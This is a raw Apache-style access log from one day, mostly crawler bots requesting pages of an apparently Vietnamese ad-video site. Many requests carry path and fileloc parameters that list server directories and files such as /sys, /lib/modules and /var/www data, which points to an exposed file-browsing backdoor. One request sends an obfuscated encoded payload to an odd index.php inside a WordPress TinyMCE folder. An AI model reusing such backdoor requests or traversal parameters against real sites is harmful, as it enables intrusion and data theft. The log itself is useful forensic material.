51.77.216.62 - - [16/Nov/2025:00:07:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm/cache.h&path=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm HTTP/1.0" 200 3224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.215 - - [16/Nov/2025:00:07:29 +0000] "GET /9pabwf38117.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory8/node0/memory6/power HTTP/1.0" 200 3576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:30 +0000] "GET /77ophpe3265.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory7/node0/cpu0/subsystem HTTP/1.0" 200 3432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:30 +0000] "GET /27vjvv2667.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.2.191.202 - - [16/Nov/2025:00:07:31 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/class/misc/kvm/subsystem/snapshot/subsystem/autofs/subsystem/device-mapper HTTP/1.0" 200 3371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.216.62 - - [16/Nov/2025:00:07:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm/cacheflush.h&path=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm HTTP/1.0" 200 4313 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
136.243.153.17 - - [16/Nov/2025:00:07:31 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Fwww%2Flamphim%2Fdata%2F.wp-cli HTTP/1.0" 200 3168 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.8 - - [16/Nov/2025:00:07:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/memory0/subsystem HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:31 +0000] "GET /11obquu3121.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory5/node0/memory0/power HTTP/1.0" 200 3575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:32 +0000] "GET /81llour9487.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory7/node0/memory1/power HTTP/1.0" 200 3576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:07:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm/cacheops.h&path=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm HTTP/1.0" 200 3849 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.215 - - [16/Nov/2025:00:07:33 +0000] "GET /90nhrm4224.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory3/node0/memory6/power HTTP/1.0" 200 3576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:34 +0000] "GET /5vgwto49767.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
44.221.105.234 - - [16/Nov/2025:00:07:34 +0000] "GET /our-works/tvc-jokky/?path=//sys/class/input/input1/subsystem/input1/subsystem/input0/subsystem/input3 HTTP/1.0" 200 3678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:07:34 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory9/node0/subsystem HTTP/1.0" 200 3423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:34 +0000] "GET /98yihau3864.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory3/node0/memory8/power HTTP/1.0" 200 3576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:07:35 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm/cdmm.h&path=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm HTTP/1.0" 200 4358 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.215 - - [16/Nov/2025:00:07:35 +0000] "GET /1wsaqw34005.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory12/node0/subsystem HTTP/1.0" 200 3422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:36 +0000] "GET /68jwjj6066.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory0/node0/cpu0/subsystem HTTP/1.0" 200 3431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:37 +0000] "GET /74wtxkl8142.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:07:37 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm/cevt-r4k.h&path=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm HTTP/1.0" 200 3354 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.8 - - [16/Nov/2025:00:07:37 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory1/node0/subsystem HTTP/1.0" 200 3422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:38 +0000] "GET /28djndm8498.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory0/node0/memory4/power HTTP/1.0" 200 3575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:38 +0000] "GET /182izglr444.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.156.55.147 - - [16/Nov/2025:00:07:38 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/devices/virtual/misc/ecryptfs/subsystem/snapshot/subsystem/snapshot/subsystem HTTP/1.0" 200 3848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:07:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory2/node0/memory0/power HTTP/1.0" 200 3575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:39 +0000] "GET /56iwps6576.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:07:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm/checksum.h&path=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm HTTP/1.0" 200 4991 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.8 - - [16/Nov/2025:00:07:40 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory3/node0/cpu1/topology HTTP/1.0" 200 3674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
114.119.132.10 - - [16/Nov/2025:00:07:40 +0000] "GET /q-~271qkost7b7owQVCxkolGoJPE0uCTUdXD44876/ HTTP/1.0" 200 4804 "https://lamphimquangcao.net/sitemap998.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.215 - - [16/Nov/2025:00:07:40 +0000] "GET /52onakb8248.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:40 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory12/node0/hugepages HTTP/1.0" 200 3275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:41 +0000] "GET /55texw7447.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/memory5/subsystem HTTP/1.0" 200 3431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:07:41 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm/clock.h&path=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm HTTP/1.0" 200 3305 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.215 - - [16/Nov/2025:00:07:42 +0000] "GET /8vyypi22310.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:42 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory5/node0/memory2/power HTTP/1.0" 200 3576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:42 +0000] "GET /51triqf1773.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.231.181.240 - - [16/Nov/2025:00:07:43 +0000] "GET /our-works/phim-viral-ila/?path=//sys/class/input/event2/subsystem/event1/device/device/driver HTTP/1.0" 200 3451 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:07:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/memory8/subsystem HTTP/1.0" 200 3431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:43 +0000] "GET /8txma20022.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:07:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm/clocksource.h&path=//lib/modules/5.4.0-214-generic/build/arch/mips/include/asm HTTP/1.0" 200 3252 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.8 - - [16/Nov/2025:00:07:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu0/driver/cpu0/subsystem HTTP/1.0" 200 3435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:44 +0000] "GET /52snwdk5402.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/memory4/subsystem HTTP/1.0" 200 3431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:07:45 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Femail HTTP/1.0" 200 2907 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.215 - - [16/Nov/2025:00:07:45 +0000] "GET /60hvlg9500.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory2/node0/memory5/power HTTP/1.0" 200 3576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:46 +0000] "GET /72eyzsy3616.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.225.199.17 - - [16/Nov/2025:00:07:46 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/devices/virtual/misc/ecryptfs/subsystem/snapshot/subsystem/snapshot/subsystem HTTP/1.0" 200 3848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:07:46 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/node0/memory0/subsystem HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:47 +0000] "GET /23hmegz4331.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:47 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory3/node0/cpu0/topology HTTP/1.0" 200 3674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:47 +0000] "GET /93lfvge5119.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:48 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu0/subsystem HTTP/1.0" 200 3462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [16/Nov/2025:00:05:27 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235353132372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313532372q3861626435636565653464356363636331323464363935346163323632356662222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
74.7.227.215 - - [16/Nov/2025:00:07:48 +0000] "GET /237aamgg195.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu1/subsystem HTTP/1.0" 200 3462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:49 +0000] "GET /220nxzpw180.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory14/node0/hugepages/hugepages-1048576kB HTTP/1.0" 200 3356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:50 +0000] "GET /48jrorv1046.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:50 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory5/node0/power HTTP/1.0" 200 3627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:50 +0000] "GET /92rsnzp4392.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:51 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory2/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.85.126.86 - - [16/Nov/2025:00:07:51 +0000] "GET /our-works/phim-viral-ila/?path=//sys/class/virtio-ports/vport2p1/subsystem/vport2p1/device/virtio-ports/vport2p1 HTTP/1.0" 200 3424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:07:51 +0000] "GET /50eaezr6924.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory2/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:52 +0000] "GET /37khojy7131.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory6/node0 HTTP/1.0" 200 4194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:53 +0000] "GET /9thsg41989.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:53 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory0/subsystem/devices/memory3/node0 HTTP/1.0" 200 4201 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:54 +0000] "GET /21tmszq4171.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory3/node0 HTTP/1.0" 200 4199 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
44.215.61.66 - - [16/Nov/2025:00:07:54 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/class/input/input0/subsystem/input0/event0/subsystem/input0/subsystem HTTP/1.0" 200 3589 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:07:54 +0000] "GET /77aerh9861.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:55 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory3/node0/cpu0/topology/package_cpus&path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory3/node0/cpu0/topology HTTP/1.0" 200 2936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:55 +0000] "GET /140npfvr842.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory4/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:56 +0000] "GET /5ecoph28505.html?path=/var/www/ttyttranyen HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory0/subsystem/devices/memory7/node0 HTTP/1.0" 200 4200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:07:57 +0000] "GET /45enul1441.html?path=/var/www/trangchihere HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:07:57 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory6/node0 HTTP/1.0" 200 4197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
